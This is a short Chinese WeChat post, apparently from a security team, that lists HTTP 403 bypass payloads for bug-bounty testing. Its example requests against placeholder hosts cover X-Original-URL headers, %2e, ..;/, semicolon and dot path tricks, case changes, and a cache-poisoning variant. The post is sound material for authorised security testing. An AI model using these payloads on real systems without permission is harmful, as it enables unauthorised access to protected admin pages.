由于微信公众号推送机制的改变避免错过文章麻烦您将公众号设为星标感谢您的支持!
想要学习:【漏洞挖掘,内网渗透OSCP,车联网,二进制】的朋友欢迎加入知识星球一起学习。如果不满意,72小时内可在APP内无条件自助退款。
1,使用“X-Original-URL”标头
GET /admin HTTP/1.1Host: target.com尝试这个来绕过GET /anything HTTP/1.1Host: target.comX-Original-URL: /admin
2,在第一个斜杠后附加 %2e
http://target.com/admin => 403尝试这个来绕过http://target.com/%2e/admin => 200
3,尝试在 URL 中添加点 (.) 斜杠 (/) 和分号 (;)
http://target.com/admin => 403尝试这个来绕过http://target.com/secret/. => 200http://target.com//secret// => 200http://target.com/./secret/.. => 200http://target.com/;/secret => 200http://target.com/.;/secret => 200http://target.com//;//secret => 200
4,在目录名后添加“..;/”
http://target.com/admin尝试这个来绕过http://target.com/admin..;/
5,尝试将 url 中的字母大写
http://target.com/admin尝试这个来绕过http://target.com/aDmIN
6,通过网络缓存中毒
GET /anything HTTP/1.1Host: victim.comX-Original-URL: /admin
喜欢朋友可以点点赞转发转发。
免责声明:本公众号不承担任何由于传播、利用本公众号所发布内容而造成的任何后果及法律责任。未经许可,不得转载。
原文始发于微信公众号(重生者安全团队):【赏金猎人】403绕过Payload+场景
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论